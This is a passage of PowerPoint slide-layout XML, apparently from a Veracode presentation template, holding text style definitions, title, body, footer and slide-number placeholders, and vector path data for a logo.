          <a:cs typeface="+mj-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="1000"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="bg2"/>
        </a:buClr>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buNone/>
        <a:tabLst/>
        <a:defRPr sz="2000" b="0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Trebuchet MS" panose="020B0703020202090204" pitchFamily="34" charset="0"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="463550" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="500"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="bg2"/>
        </a:buClr>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:tabLst/>
        <a:defRPr sz="1800" b="0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Trebuchet MS" panose="020B0703020202090204" pitchFamily="34" charset="0"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="630238" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="500"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="bg2"/>
        </a:buClr>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:tabLst/>
        <a:defRPr sz="1600" b="0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Trebuchet MS" panose="020B0703020202090204" pitchFamily="34" charset="0"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="808038" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="500"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="bg2"/>
        </a:buClr>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:tabLst/>
        <a:defRPr sz="1400" b="0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Trebuchet MS" panose="020B0703020202090204" pitchFamily="34" charset="0"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="857250" indent="-166688" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="500"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="bg2"/>
        </a:buClr>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:tabLst/>
        <a:defRPr sz="1400" b="0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Trebuchet MS" panose="020B070302020209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22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7B19EA6-4729-1143-8DF2-230A34FE7099}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="279256" y="193040"/>
            <a:ext cx="11590965" cy="98552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5FEB77B-1C3F-4D4F-B922-37B481BD4BCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="279256" y="1464190"/>
            <a:ext cx="11616570" cy="4797630"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:noAutofit/>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22" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E2EB9A8-796F-A54A-A124-B8DEA39D67F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="397496" y="6526743"/>
            <a:ext cx="2766117" cy="331257"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1100">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0703020202090204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>© Veracode, Inc. 2024 Confidential </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26C9E083-7B66-9640-9AA3-5E789A9B744B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6526743"/>
            <a:ext cx="397497" cy="331257"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1100" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="62" name="Graphic 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84919F93-FB06-0640-96B4-3CA22BFC1C0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10798550" y="6539461"/>
            <a:ext cx="1097276" cy="163367"/>
            <a:chOff x="9041039" y="6539461"/>
            <a:chExt cx="1097276" cy="163367"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="63" name="Freeform 62">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEB47DAD-F683-314D-BEA8-6038268298AC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9713519" y="6539612"/>
              <a:ext cx="217199" cy="163216"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 82460 w 217199"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 163216"/>
                <a:gd name="connsiteX1" fmla="*/ 0 w 217199"/>
                <a:gd name="connsiteY1" fmla="*/ 81608 h 163216"/>
                <a:gd name="connsiteX2" fmla="*/ 82460 w 217199"/>
                <a:gd name="connsiteY2" fmla="*/ 163216 h 163216"/>
                <a:gd name="connsiteX3" fmla="*/ 164919 w 217199"/>
                <a:gd name="connsiteY3" fmla="*/ 81911 h 163216"/>
                <a:gd name="connsiteX4" fmla="*/ 82460 w 217199"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 163216"/>
                <a:gd name="connsiteX5" fmla="*/ 82460 w 217199"/>
                <a:gd name="connsiteY5" fmla="*/ 131724 h 163216"/>
                <a:gd name="connsiteX6" fmla="*/ 33533 w 217199"/>
                <a:gd name="connsiteY6" fmla="*/ 81608 h 163216"/>
                <a:gd name="connsiteX7" fmla="*/ 82460 w 217199"/>
                <a:gd name="connsiteY7" fmla="*/ 31493 h 163216"/>
                <a:gd name="connsiteX8" fmla="*/ 131387 w 217199"/>
                <a:gd name="connsiteY8" fmla="*/ 82365 h 163216"/>
                <a:gd name="connsiteX9" fmla="*/ 82460 w 217199"/>
                <a:gd name="connsiteY9" fmla="*/ 131724 h 163216"/>
                <a:gd name="connsiteX10" fmla="*/ 183667 w 217199"/>
                <a:gd name="connsiteY10" fmla="*/ 160491 h 163216"/>
                <a:gd name="connsiteX11" fmla="*/ 183667 w 217199"/>
                <a:gd name="connsiteY11" fmla="*/ 34218 h 163216"/>
                <a:gd name="connsiteX12" fmla="*/ 158670 w 217199"/>
                <a:gd name="connsiteY12" fmla="*/ 34218 h 163216"/>
                <a:gd name="connsiteX13" fmla="*/ 158670 w 217199"/>
                <a:gd name="connsiteY13" fmla="*/ 2725 h 163216"/>
                <a:gd name="connsiteX14" fmla="*/ 183667 w 217199"/>
                <a:gd name="connsiteY14" fmla="*/ 2725 h 163216"/>
                <a:gd name="connsiteX15" fmla="*/ 192660 w 217199"/>
                <a:gd name="connsiteY15" fmla="*/ 2725 h 163216"/>
                <a:gd name="connsiteX16" fmla="*/ 217199 w 217199"/>
                <a:gd name="connsiteY16" fmla="*/ 2725 h 163216"/>
                <a:gd name="connsiteX17" fmla="*/ 217199 w 217199"/>
                <a:gd name="connsiteY17" fmla="*/ 34218 h 163216"/>
                <a:gd name="connsiteX18" fmla="*/ 217199 w 217199"/>
                <a:gd name="connsiteY18" fmla="*/ 128998 h 163216"/>
                <a:gd name="connsiteX19" fmla="*/ 217199 w 217199"/>
                <a:gd name="connsiteY19" fmla="*/ 160491 h 163216"/>
                <a:gd name="connsiteX20" fmla="*/ 183667 w 217199"/>
                <a:gd name="connsiteY20" fmla="*/ 160491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7199" h="163216">
                  <a:moveTo>
                    <a:pt x="82460" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="37038" y="0"/>
                    <a:pt x="0" y="36640"/>
                    <a:pt x="0" y="81608"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="126576"/>
                    <a:pt x="37038" y="163216"/>
                    <a:pt x="82460" y="163216"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127881" y="163216"/>
                    <a:pt x="164919" y="126727"/>
                    <a:pt x="164919" y="81911"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="164919" y="36035"/>
                    <a:pt x="128643" y="0"/>
                    <a:pt x="82460" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="82460" y="131724"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="48622" y="131724"/>
                    <a:pt x="33533" y="102351"/>
                    <a:pt x="33533" y="81608"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33533" y="60714"/>
                    <a:pt x="48775" y="31493"/>
                    <a:pt x="82460" y="31493"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="118126" y="31493"/>
                    <a:pt x="131387" y="62682"/>
                    <a:pt x="131387" y="82365"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="131387" y="102805"/>
                    <a:pt x="116297" y="131724"/>
                    <a:pt x="82460" y="131724"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="183667" y="160491"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="183667" y="34218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158670" y="34218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158670" y="2725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183667" y="2725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192660" y="2725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217199" y="2725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217199" y="34218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217199" y="128998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217199" y="160491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183667" y="160491"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:ln w="1512" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" b="0" i="0">
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="Freeform 63">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E605F8F2-3A59-3443-BA4B-D12AB12C6FE8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9041039" y="6542337"/>
              <a:ext cx="521735" cy="157765"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 156993 w 521735"/>
                <a:gd name="connsiteY0" fmla="*/ 157765 h 157765"/>
                <a:gd name="connsiteX1" fmla="*/ 248141 w 521735"/>
                <a:gd name="connsiteY1" fmla="*/ 157765 h 157765"/>
                <a:gd name="connsiteX2" fmla="*/ 248141 w 521735"/>
                <a:gd name="connsiteY2" fmla="*/ 126273 h 157765"/>
                <a:gd name="connsiteX3" fmla="*/ 190373 w 521735"/>
                <a:gd name="connsiteY3" fmla="*/ 126273 h 157765"/>
                <a:gd name="connsiteX4" fmla="*/ 190373 w 521735"/>
                <a:gd name="connsiteY4" fmla="*/ 94023 h 157765"/>
                <a:gd name="connsiteX5" fmla="*/ 248141 w 521735"/>
                <a:gd name="connsiteY5" fmla="*/ 94023 h 157765"/>
                <a:gd name="connsiteX6" fmla="*/ 248141 w 521735"/>
                <a:gd name="connsiteY6" fmla="*/ 62379 h 157765"/>
                <a:gd name="connsiteX7" fmla="*/ 190373 w 521735"/>
                <a:gd name="connsiteY7" fmla="*/ 62379 h 157765"/>
                <a:gd name="connsiteX8" fmla="*/ 190373 w 521735"/>
                <a:gd name="connsiteY8" fmla="*/ 31493 h 157765"/>
                <a:gd name="connsiteX9" fmla="*/ 248141 w 521735"/>
                <a:gd name="connsiteY9" fmla="*/ 31493 h 157765"/>
                <a:gd name="connsiteX10" fmla="*/ 248141 w 521735"/>
                <a:gd name="connsiteY10" fmla="*/ 0 h 157765"/>
                <a:gd name="connsiteX11" fmla="*/ 156993 w 521735"/>
                <a:gd name="connsiteY11" fmla="*/ 0 h 157765"/>
                <a:gd name="connsiteX12" fmla="*/ 156993 w 521735"/>
                <a:gd name="connsiteY12" fmla="*/ 157765 h 157765"/>
                <a:gd name="connsiteX13" fmla="*/ 74534 w 521735"/>
                <a:gd name="connsiteY13" fmla="*/ 98717 h 157765"/>
                <a:gd name="connsiteX14" fmla="*/ 36124 w 521735"/>
                <a:gd name="connsiteY14" fmla="*/ 0 h 157765"/>
                <a:gd name="connsiteX15" fmla="*/ 0 w 521735"/>
                <a:gd name="connsiteY15" fmla="*/ 0 h 157765"/>
                <a:gd name="connsiteX16" fmla="*/ 64017 w 521735"/>
                <a:gd name="connsiteY16" fmla="*/ 157765 h 157765"/>
                <a:gd name="connsiteX17" fmla="*/ 85051 w 521735"/>
                <a:gd name="connsiteY17" fmla="*/ 157765 h 157765"/>
                <a:gd name="connsiteX18" fmla="*/ 148763 w 521735"/>
                <a:gd name="connsiteY18" fmla="*/ 0 h 157765"/>
                <a:gd name="connsiteX19" fmla="*/ 113096 w 521735"/>
                <a:gd name="connsiteY19" fmla="*/ 0 h 157765"/>
                <a:gd name="connsiteX20" fmla="*/ 74534 w 521735"/>
                <a:gd name="connsiteY20" fmla="*/ 98717 h 157765"/>
                <a:gd name="connsiteX21" fmla="*/ 433942 w 521735"/>
                <a:gd name="connsiteY21" fmla="*/ 0 h 157765"/>
                <a:gd name="connsiteX22" fmla="*/ 376631 w 521735"/>
                <a:gd name="connsiteY22" fmla="*/ 151406 h 157765"/>
                <a:gd name="connsiteX23" fmla="*/ 341270 w 521735"/>
                <a:gd name="connsiteY23" fmla="*/ 101897 h 157765"/>
                <a:gd name="connsiteX24" fmla="*/ 378460 w 521735"/>
                <a:gd name="connsiteY24" fmla="*/ 52689 h 157765"/>
                <a:gd name="connsiteX25" fmla="*/ 363066 w 521735"/>
                <a:gd name="connsiteY25" fmla="*/ 13929 h 157765"/>
                <a:gd name="connsiteX26" fmla="*/ 319778 w 521735"/>
                <a:gd name="connsiteY26" fmla="*/ 0 h 157765"/>
                <a:gd name="connsiteX27" fmla="*/ 268260 w 521735"/>
                <a:gd name="connsiteY27" fmla="*/ 0 h 157765"/>
                <a:gd name="connsiteX28" fmla="*/ 268260 w 521735"/>
                <a:gd name="connsiteY28" fmla="*/ 157765 h 157765"/>
                <a:gd name="connsiteX29" fmla="*/ 301793 w 521735"/>
                <a:gd name="connsiteY29" fmla="*/ 157765 h 157765"/>
                <a:gd name="connsiteX30" fmla="*/ 301793 w 521735"/>
                <a:gd name="connsiteY30" fmla="*/ 102351 h 157765"/>
                <a:gd name="connsiteX31" fmla="*/ 341422 w 521735"/>
                <a:gd name="connsiteY31" fmla="*/ 157765 h 157765"/>
                <a:gd name="connsiteX32" fmla="*/ 409097 w 521735"/>
                <a:gd name="connsiteY32" fmla="*/ 157765 h 157765"/>
                <a:gd name="connsiteX33" fmla="*/ 421443 w 521735"/>
                <a:gd name="connsiteY33" fmla="*/ 125062 h 157765"/>
                <a:gd name="connsiteX34" fmla="*/ 473723 w 521735"/>
                <a:gd name="connsiteY34" fmla="*/ 125062 h 157765"/>
                <a:gd name="connsiteX35" fmla="*/ 486069 w 521735"/>
                <a:gd name="connsiteY35" fmla="*/ 157765 h 157765"/>
                <a:gd name="connsiteX36" fmla="*/ 521736 w 521735"/>
                <a:gd name="connsiteY36" fmla="*/ 157765 h 157765"/>
                <a:gd name="connsiteX37" fmla="*/ 461530 w 521735"/>
                <a:gd name="connsiteY37" fmla="*/ 0 h 157765"/>
                <a:gd name="connsiteX38" fmla="*/ 433942 w 521735"/>
                <a:gd name="connsiteY38" fmla="*/ 0 h 157765"/>
                <a:gd name="connsiteX39" fmla="*/ 310481 w 521735"/>
                <a:gd name="connsiteY39" fmla="*/ 75249 h 157765"/>
                <a:gd name="connsiteX40" fmla="*/ 301793 w 521735"/>
                <a:gd name="connsiteY40" fmla="*/ 75249 h 157765"/>
                <a:gd name="connsiteX41" fmla="*/ 301793 w 521735"/>
                <a:gd name="connsiteY41" fmla="*/ 31493 h 157765"/>
                <a:gd name="connsiteX42" fmla="*/ 318407 w 521735"/>
                <a:gd name="connsiteY42" fmla="*/ 31493 h 157765"/>
                <a:gd name="connsiteX43" fmla="*/ 344928 w 521735"/>
                <a:gd name="connsiteY43" fmla="*/ 52689 h 157765"/>
                <a:gd name="connsiteX44" fmla="*/ 310481 w 521735"/>
                <a:gd name="connsiteY44" fmla="*/ 75249 h 157765"/>
                <a:gd name="connsiteX45" fmla="*/ 432722 w 521735"/>
                <a:gd name="connsiteY45" fmla="*/ 94629 h 157765"/>
                <a:gd name="connsiteX46" fmla="*/ 447812 w 521735"/>
                <a:gd name="connsiteY46" fmla="*/ 51781 h 157765"/>
                <a:gd name="connsiteX47" fmla="*/ 462749 w 521735"/>
                <a:gd name="connsiteY47" fmla="*/ 94629 h 157765"/>
                <a:gd name="connsiteX48" fmla="*/ 432722 w 521735"/>
                <a:gd name="connsiteY48" fmla="*/ 94629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21735" h="157765">
                  <a:moveTo>
                    <a:pt x="156993" y="157765"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="248141" y="157765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248141" y="126273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190373" y="126273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190373" y="94023"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248141" y="94023"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248141" y="62379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190373" y="62379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190373" y="31493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248141" y="31493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248141" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156993" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156993" y="157765"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="74534" y="98717"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="66151" y="77066"/>
                    <a:pt x="36124" y="0"/>
                    <a:pt x="36124" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64017" y="157765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85051" y="157765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148763" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113096" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="113096" y="0"/>
                    <a:pt x="83069" y="77066"/>
                    <a:pt x="74534" y="98717"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="433942" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="376631" y="151406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="341270" y="101897"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="356969" y="97960"/>
                    <a:pt x="378460" y="85393"/>
                    <a:pt x="378460" y="52689"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="378460" y="37549"/>
                    <a:pt x="372668" y="23014"/>
                    <a:pt x="363066" y="13929"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="352854" y="4391"/>
                    <a:pt x="339593" y="0"/>
                    <a:pt x="319778" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="268260" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268260" y="157765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301793" y="157765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301793" y="102351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="341422" y="157765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="409097" y="157765"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="409097" y="157765"/>
                    <a:pt x="416566" y="138083"/>
                    <a:pt x="421443" y="125062"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="473723" y="125062"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="478601" y="138083"/>
                    <a:pt x="486069" y="157765"/>
                    <a:pt x="486069" y="157765"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="521736" y="157765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="461530" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="433942" y="0"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="310481" y="75249"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="301793" y="75249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301793" y="31493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318407" y="31493"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="337917" y="31493"/>
                    <a:pt x="344928" y="42394"/>
                    <a:pt x="344928" y="52689"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="344928" y="58291"/>
                    <a:pt x="344928" y="75249"/>
                    <a:pt x="310481" y="75249"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="432722" y="94629"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="438209" y="79186"/>
                    <a:pt x="445373" y="59351"/>
                    <a:pt x="447812" y="51781"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="462749" y="94629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432722" y="94629"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="1512" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" b="0" i="0">
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="65" name="Freeform 64">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B93C43F-7645-BB42-BE7C-FA753336CE48}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10047168" y="6542337"/>
              <a:ext cx="91147" cy="157765"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 91148 w 91147"/>
                <a:gd name="connsiteY0" fmla="*/ 31493 h 157765"/>
                <a:gd name="connsiteX1" fmla="*/ 91148 w 91147"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 157765"/>
                <a:gd name="connsiteX2" fmla="*/ 0 w 91147"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 157765"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 91147"/>
